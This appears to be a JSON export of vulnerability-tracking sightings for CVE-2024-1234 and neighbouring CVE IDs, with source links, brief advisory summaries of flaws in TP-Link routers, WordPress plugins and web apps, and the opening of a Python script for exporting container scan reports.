{"vulnerability": "CVE-2024-1234", "sightings": [{"uuid": "5acc0e3c-43ab-4e8d-92c9-d72b954b6432", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12348", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113620042594523349", "content": "", "creation_timestamp": "2024-12-09T00:31:03.719778Z"}, {"uuid": "4b656020-38aa-483e-afa6-960f5dc8542f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12343", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113616512565146996", "content": "", "creation_timestamp": "2024-12-08T09:33:20.092902Z"}, {"uuid": "6c7d6b30-dec4-48eb-aadb-bec6d2b14bef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12349", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113620042610266633", "content": "", "creation_timestamp": "2024-12-09T00:31:04.281123Z"}, {"uuid": "69522bed-d19c-4bfa-b262-12dae210f90e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12344", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113619720536909057", "content": "", "creation_timestamp": "2024-12-08T23:09:09.854534Z"}, {"uuid": "91c4c32a-2275-4fe2-ac0c-9a21d13bb98d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12346", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113619819168185275", "content": "", "creation_timestamp": "2024-12-08T23:34:14.459560Z"}, {"uuid": "2ccb330b-12df-4cb7-9162-ee6d845f163a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", 
"author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12347", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113619819183044274", "content": "", "creation_timestamp": "2024-12-08T23:34:15.226513Z"}, {"uuid": "795172cc-2273-4e78-961e-aa6193f0b9a4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12341", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113637984688949211", "content": "", "creation_timestamp": "2024-12-12T04:33:58.816701Z"}, {"uuid": "e6d5f125-0b9f-4512-94ac-8098005c8c9d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12340", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113673114767404104", "content": "", "creation_timestamp": "2024-12-18T09:28:00.916983Z"}, {"uuid": "90e113e7-11ea-49ce-af91-d47d908348d0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-1234", "type": "seen", "source": "https://bsky.app/profile/barrymurrell.bsky.social/post/3leynxkqook2c", "content": "", "creation_timestamp": "2025-01-05T12:52:12.895757Z"}, {"uuid": "0974234c-d2e1-4d79-afaf-e8d372f8d55a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12345", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113899992485971241", "content": "", "creation_timestamp": "2025-01-27T11:06:00.055681Z"}, {"uuid": "28141cc4-dbfa-4ba3-ae18-ed727bd4145b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12345", "type": "seen", "source": 
"https://bsky.app/profile/cve-notifications.bsky.social/post/3lgpstcow3g2t", "content": "", "creation_timestamp": "2025-01-27T11:15:45.199977Z"}, {"uuid": "b8bb9d26-25b3-4622-af78-a756e5b61717", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12345", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3lgq73klgd52w", "content": "", "creation_timestamp": "2025-01-27T14:55:09.619467Z"}, {"uuid": "e772615a-6b29-4a8c-bf0c-5bde73e8e202", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12345", "type": "seen", "source": "https://gist.github.com/ndouglas-cloudsmith/44943d8a7c6ed78006cf65ec5bb79d27", "content": "", "creation_timestamp": "2025-06-10T14:19:59.000000Z"}, {"uuid": "d098e843-e7f0-46b3-b46a-d869fccd9ad2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12342", "type": "seen", "source": "https://bsky.app/profile/beikokucyber.bsky.social/post/3ln4jem2w4m2u", "content": "", "creation_timestamp": "2025-04-18T21:02:14.204746Z"}, {"uuid": "ae677281-eb13-4c80-916c-2ad5f79dde88", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12344", "type": "seen", "source": "https://bsky.app/profile/beikokucyber.bsky.social/post/3ln4jem6ejy2t", "content": "", "creation_timestamp": "2025-04-18T21:02:14.845305Z"}, {"uuid": "5a7b0e47-a998-48a4-8ad2-3f4ea3ce953f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12345", "type": "seen", "source": "https://gist.github.com/ndouglas-cloudsmith/686c24676d9281ea13827f50230bb60b", "content": "", "creation_timestamp": 
"2025-06-17T11:41:04.000000Z"}, {"uuid": "8e4b6c87-3466-4a6e-a4c1-f5c26ea9e302", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12345", "type": "seen", "source": "https://bsky.app/profile/ferramentaslinux.bsky.social/post/3m2qxtbturk2f", "content": "", "creation_timestamp": "2025-10-09T10:41:48.215687Z"}, {"uuid": "c6c7ccec-7916-4562-92d0-32b73ccab0e4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-1234", "type": "seen", "source": "https://gist.github.com/mytreya-rh/da4aef61a7ab8816fa11198f9b064846", "content": "", "creation_timestamp": "2025-11-13T12:36:23.000000Z"}, {"uuid": "8526fe66-7a1a-44e8-b658-8ba72db03172", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-1234", "type": "seen", "source": "https://gist.github.com/cd1zz/aa95fc8e06911decc6ab4a72f4c26c2f", "content": "", "creation_timestamp": "2025-09-11T14:10:40.000000Z"}, {"uuid": "b24284fd-36d3-48aa-8818-994fa8a15688", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12345", "type": "seen", "source": "https://gist.github.com/Darkcrai86/fa0739ddcf27cecc82d4966f4e19ff1f", "content": "", "creation_timestamp": "2025-09-11T14:49:57.000000Z"}, {"uuid": "7bc416cb-ae0f-44f8-8b59-41594c537a76", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12345", "type": "seen", "source": "https://gist.github.com/mjervis-mo/a8bcddf5b94155ee1cdfc53b873a0408", "content": "", "creation_timestamp": "2025-09-09T09:41:23.000000Z"}, {"uuid": "1e8d2e6c-c379-43c2-ac62-f8f34dffd2f5", "vulnerability_lookup_origin": 
"1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-1234", "type": "seen", "source": "https://gist.github.com/semo970921/b7900f5845408aca8633df26a5a0059b", "content": "", "creation_timestamp": "2026-02-06T06:51:25.000000Z"}, {"uuid": "cfe61d7a-0a0a-4586-8524-6f32afab1898", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12345", "type": "seen", "source": "https://gist.github.com/semo970921/b7900f5845408aca8633df26a5a0059b", "content": "", "creation_timestamp": "2026-02-06T06:51:25.000000Z"}, {"uuid": "a2fefa8d-9562-48a1-bca0-deebc6af98c9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12345", "type": "seen", "source": "https://bsky.app/profile/undercode.bsky.social/post/3mgi4fbshkx2m", "content": "", "creation_timestamp": "2026-03-07T15:11:47.833425Z"}, {"uuid": "8573a3b6-3690-440c-ad09-31f0f201adc9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-1234", "type": "seen", "source": "https://bsky.app/profile/undercode.bsky.social/post/3mggzy4feyt2d", "content": "", "creation_timestamp": "2026-03-07T04:55:57.851164Z"}, {"uuid": "e0b05d18-59e6-4ac0-97f9-cb0f6e28e706", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-1234", "type": "seen", "source": "https://gist.github.com/gal-dahan-wiz/a770c7ef4af0cfe9030251cd58d6bb23", "content": "", "creation_timestamp": "2026-03-06T12:29:52.000000Z"}, {"uuid": "79d48e79-edda-47ff-bef2-f9dea3f0de80", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-1234", "type": "seen", 
"source": "https://gist.github.com/gal-dahan-wiz/13c8354a0ad368d7f2c33206cf8c925d", "content": "", "creation_timestamp": "2026-02-26T14:47:40.000000Z"}, {"uuid": "06d3fd42-ef6a-4732-96a8-616daf99fc4a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-1234", "type": "seen", "source": "https://bsky.app/profile/undercode.bsky.social/post/3mfdedpwzf52x", "content": "", "creation_timestamp": "2026-02-21T00:25:33.830547Z"}, {"uuid": "f157f036-4f9f-4a6c-9635-7f1f8fe0636a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12345", "type": "seen", "source": "https://gist.github.com/ayoubzulfiqar/5b320151951fbdba0fb72a578f7b57ef", "content": "", "creation_timestamp": "2026-02-12T09:05:29.000000Z"}, {"uuid": "0932a0a9-98e7-4369-9ee7-1a7038d2425e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-1234", "type": "seen", "source": "https://gist.github.com/aurixai-solutions/313b026594574c70a22f8d72ef7c665b", "content": "", "creation_timestamp": "2026-02-21T06:48:02.000000Z"}, {"uuid": "cf4cc331-5846-4422-a446-68404d99302e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12345", "type": "seen", "source": "https://gist.github.com/johnmillerATcodemag-com/6197fcf6c9000612e97935ad88d79021", "content": "", "creation_timestamp": "2025-12-30T16:44:44.000000Z"}, {"uuid": "51983c94-d93d-443c-a31e-c0092b361d72", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12345", "type": "seen", "source": "https://bsky.app/profile/undercode.bsky.social/post/3mftp4jriqm2z", "content": "", "creation_timestamp": 
"2026-02-27T12:20:59.145215Z"}, {"uuid": "25407747-a01f-4ba2-b0ec-24353e581773", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12345", "type": "seen", "source": "https://bsky.app/profile/undercode.bsky.social/post/3mhfjovwlsf2q", "content": "", "creation_timestamp": "2026-03-19T07:57:00.613569Z"}, {"uuid": "eda01484-bb45-43a5-add2-18b8b669b958", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12345", "type": "seen", "source": "https://gist.github.com/alon710/c4a18bfb1b633de803c3c0a7eb9a1a7e", "content": "", "creation_timestamp": "2026-01-24T22:44:25.000000Z"}, {"uuid": "092a1f8c-c71e-457e-a303-a09a119fbb74", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-1234", "type": "seen", "source": "https://gist.github.com/allan-gar2x/1de8a0db406b1b36cdc364fa96d2c93b", "content": "", "creation_timestamp": "2026-04-15T10:12:38.000000Z"}, {"uuid": "814aabd0-ed05-4ec6-a174-e4926acffa99", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-1234", "type": "seen", "source": "https://gist.github.com/allan-gar2x/9fba3a5260416b87679023ab2384d446", "content": "", "creation_timestamp": "2026-04-15T10:38:50.000000Z"}, {"uuid": "36dc0abc-9a34-4ca4-955e-96a4cbe43567", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12345", "type": "seen", "source": "https://bsky.app/profile/atomicedge.bsky.social/post/3mjnfn3w3d72u", "content": "", "creation_timestamp": "2026-04-16T21:56:11.069550Z"}, {"uuid": "63e2f20a-702d-4e3a-b8f3-14a78479989f", "vulnerability_lookup_origin": 
"1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2024-1234", "type": "seen", "source": "https://gist.github.com/harche/ac8e8399a9bf69091a38a5cf6e3bc56b", "content": "", "creation_timestamp": "2026-04-28T22:02:22.000000Z"}, {"uuid": "0c3c38c9-f0d8-4351-bcc2-88f616021cc9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12345", "type": "seen", "source": "https://t.me/cvedetector/16451", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-12345 - INW Krbyyyzo File Uploader DoS Vulnerability\", \n  \"Content\": \"CVE ID : CVE-2024-12345 \nPublished : Jan. 27, 2025, 11:15 a.m. | 1\u00a0hour, 14\u00a0minutes ago \nDescription : A vulnerability classified as problematic was found in INW Krbyyyzo 25.2002. Affected by this vulnerability is an unknown functionality of the file /gbo.aspx of the component Daily Huddle Site. The manipulation of the argument s leads to resource consumption. It is possible to launch the attack on the local host. Other endpoints might be affected as well. \nSeverity: 4.4 | MEDIUM \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"27 Jan 2025\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2025-01-27T14:19:26.000000Z"}, {"uuid": "0146e753-dfd1-4215-9eb7-65e6d0d7f3a1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12349", "type": "seen", "source": "https://t.me/cvedetector/12338", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-12349 - JFinalCMS Cross-Site Request Forgery Vulnerability\", \n  \"Content\": \"CVE ID : CVE-2024-12349 \nPublished : Dec. 9, 2024, 1:15 a.m. 
| 39\u00a0minutes ago \nDescription : A vulnerability was found in JFinalCMS 1.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /admin/tag/save. The manipulation leads to cross-site request forgery. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. \nSeverity: 4.3 | MEDIUM \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"09 Dec 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-12-09T02:59:06.000000Z"}, {"uuid": "1dbb1dd1-3f1b-46c4-b08b-b8cd536a5edd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12348", "type": "seen", "source": "https://t.me/cvedetector/12337", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-12348 - A vulnerability was found in Guizhou Xiaoma Techno\", \n  \"Content\": \"CVE ID : CVE-2024-12348 \nPublished : Dec. 9, 2024, 1:15 a.m. | 39\u00a0minutes ago \nDescription : A vulnerability was found in Guizhou Xiaoma Technology jpress 5.1.2. It has been classified as problematic. Affected is the function AttachmentUtils.isUnSafe of the file /commons/attachment/upload of the component Attachment Upload Handler. The manipulation of the argument files[] leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. 
\nSeverity: 3.5 | LOW \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"09 Dec 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-12-09T02:59:05.000000Z"}, {"uuid": "da94c529-43ec-4346-ac91-08e338d3bee3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12346", "type": "seen", "source": "https://t.me/cvedetector/12336", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-12346 - Talentera Cross Site Scripting Vulnerability\", \n  \"Content\": \"CVE ID : CVE-2024-12346 \nPublished : Dec. 9, 2024, 12:15 a.m. | 38\u00a0minutes ago \nDescription : A vulnerability has been found in Talentera up to 20241128 and classified as problematic. This vulnerability affects unknown code of the file /app/control/byt_cv_manager. The manipulation of the argument redirect_url leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The provided PoC only works in Mozilla Firefox. The vendor was contacted early about this disclosure but did not respond in any way. 
\nSeverity: 3.5 | LOW \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"09 Dec 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-12-09T02:09:02.000000Z"}, {"uuid": "0f72b4bf-9726-4726-bf71-db4f18c6344f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12347", "type": "seen", "source": "https://t.me/cvedetector/12335", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-12347 - \"Guangzhou Huayi Intelligent Technology Jeewms Druid Monitoring Interface Unauthorized Access Vulnerability\"\", \n  \"Content\": \"CVE ID : CVE-2024-12347 \nPublished : Dec. 9, 2024, 12:15 a.m. | 38\u00a0minutes ago \nDescription : A vulnerability was found in Guangzhou Huayi Intelligent Technology Jeewms up to 1.0.0 and classified as critical. This issue affects some unknown processing of the file /jeewms_war/webpage/system/druid/index.html of the component Druid Monitoring Interface. The manipulation leads to improper authorization. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. 
\nSeverity: 5.3 | MEDIUM \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"09 Dec 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-12-09T02:08:58.000000Z"}, {"uuid": "a8c31263-a064-4bf2-ad5e-678532340b45", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12344", "type": "seen", "source": "https://t.me/cvedetector/12334", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-12344 - TP-Link FTP USER Command Handler Remote Memory Corruption Vulnerability\", \n  \"Content\": \"CVE ID : CVE-2024-12344 \nPublished : Dec. 8, 2024, 11:15 p.m. | 36\u00a0minutes ago \nDescription : A vulnerability, which was classified as critical, was found in TP-Link VN020 F3v(T) TT_V6.2.1021. This affects an unknown part of the component FTP USER Command Handler. The manipulation leads to memory corruption. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. \nSeverity: 6.3 | MEDIUM \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"09 Dec 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-12-09T01:18:40.000000Z"}, {"uuid": "4d28adeb-3259-422a-a721-7a34d71353fa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12343", "type": "seen", "source": "https://t.me/cvedetector/12332", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-12343 - TP-Link SOAP Request Handler Buffer Overflow Vulnerability\", \n  \"Content\": \"CVE ID : CVE-2024-12343 \nPublished : Dec. 8, 2024, 10:15 a.m. 
| 35\u00a0minutes ago \nDescription : A vulnerability classified as critical has been found in TP-Link VN020 F3v(T) TT_V6.2.1021. Affected is an unknown function of the file /control/WANIPConnection of the component SOAP Request Handler. The manipulation of the argument NewConnectionType leads to buffer overflow. The attack needs to be done within the local network. The exploit has been disclosed to the public and may be used. \nSeverity: 6.5 | MEDIUM \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"08 Dec 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-12-08T11:56:11.000000Z"}, {"uuid": "74a17fcd-adb5-4d04-8a9f-199fefb34414", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12342", "type": "seen", "source": "https://t.me/cvedetector/12331", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-12342 - \"TP-Link WANIPConnection Denial of Service Vulnerability\"\", \n  \"Content\": \"CVE ID : CVE-2024-12342 \nPublished : Dec. 8, 2024, 7:15 a.m. | 42\u00a0minutes ago \nDescription : A vulnerability was found in TP-Link VN020 F3v(T) TT_V6.2.1021. It has been rated as critical. This issue affects some unknown processing of the file /control/WANIPConnection of the component Incomplete SOAP Request Handler. The manipulation leads to denial of service. The attack can only be initiated within the local network. The exploit has been disclosed to the public and may be used. 
\nSeverity: 6.5 | MEDIUM \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"08 Dec 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-12-08T09:25:40.000000Z"}, {"uuid": "04f90a54-8b57-47ce-9a32-5142b32aa34c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12341", "type": "seen", "source": "https://t.me/cvedetector/12688", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-12341 - WordPress Custom Skins Contact Form 7 Unauthenticated Data Tampering Vulnerability\", \n  \"Content\": \"CVE ID : CVE-2024-12341 \nPublished : Dec. 12, 2024, 4:15 a.m. | 36\u00a0minutes ago \nDescription : The Custom Skins Contact Form 7 plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'cf7cs_action_callback' function in all versions up to, and including, 1.0. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update the content of any post and create new skins. \nSeverity: 4.3 | MEDIUM \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"12 Dec 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-12-12T06:17:22.000000Z"}, {"uuid": "232b3895-caaa-4ebb-9ace-1f9a4153717d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12340", "type": "seen", "source": "https://t.me/cvedetector/13179", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-12340 - Elementor Animation Addons Sensitive Information Exposur\", \n  \"Content\": \"CVE ID : CVE-2024-12340 \nPublished : Dec. 18, 2024, 10:15 a.m. 
| 42\u00a0minutes ago \nDescription : The Animation Addons for Elementor plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.1.6 via the 'render' function in widgets/content-slider.php and widgets/tabs.php. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive private, pending, and draft Elementor template data. \nSeverity: 4.3 | MEDIUM \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"18 Dec 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-12-18T12:01:14.000000Z"}, {"uuid": "7241b8b4-c894-4a7d-9405-608567533dd3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-1234", "type": "seen", "source": "https://t.me/arpsyndicate/4213", "content": "#ExploitObserverAlert\n\nCVE-2024-1234\n\nDESCRIPTION: Exploit Observer has 7 entries in 2 file formats related to CVE-2024-1234. The Exclusive Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via data attribute in all versions up to, and including, 2.6.9 due to insufficient input sanitization and output escaping. 
This makes it possible for authenticated attackers, with contributor access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.\n\nFIRST-EPSS: 0.000430000", "creation_timestamp": "2024-03-15T04:06:12.000000Z"}, {"uuid": "8963e65a-7d5d-408a-ad01-b3fd7d0c9b09", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12342", "type": "published-proof-of-concept", "source": "Telegram/WaBw3Jw0vb5AGJc9tIYoYKjH3e2RrXYOROLA0rL6tF_sE5E", "content": "", "creation_timestamp": "2025-04-30T05:00:10.000000Z"}, {"uuid": "a13d81e6-4694-449d-8691-2f37b065927b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12342", "type": "published-proof-of-concept", "source": "Telegram/oXbZUyDkh9HvYDCcVwESbtZAPUw4sF4JBZ0Dd5j_85BRE8U", "content": "", "creation_timestamp": "2025-04-30T05:00:07.000000Z"}, {"uuid": "70d3d0c4-5525-4767-a13a-1ba4466df3d3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-1234", "type": "seen", "source": "https://gist.github.com/yannhowe/bc79334e9ba4f17106e2a63e09047707", "content": "#!/usr/bin/env python3\n\"\"\"\nFalcon Container Image Assessment Report\nExports ALL image fields to CSV - bypasses the 10-column UI limit.\n\nFixes:\n  - UI only shows 10 vulnerability columns \u2192 exports all 25+ fields\n  - Can't filter by last scanned date \u2192 use --last-scanned-after / --before\n  - Missing fields (container_id, registry, tag, image_id) \u2192 all included\n  - Build labels included in output (note: FQL filter not supported by API)\n\nUsage:\n  # All images, full CSV\n  python3 falcon-image-assessment-report.py\n\n  # Filter by registry (Azure Container Registry)\n  python3 falcon-image-assessment-report.py 
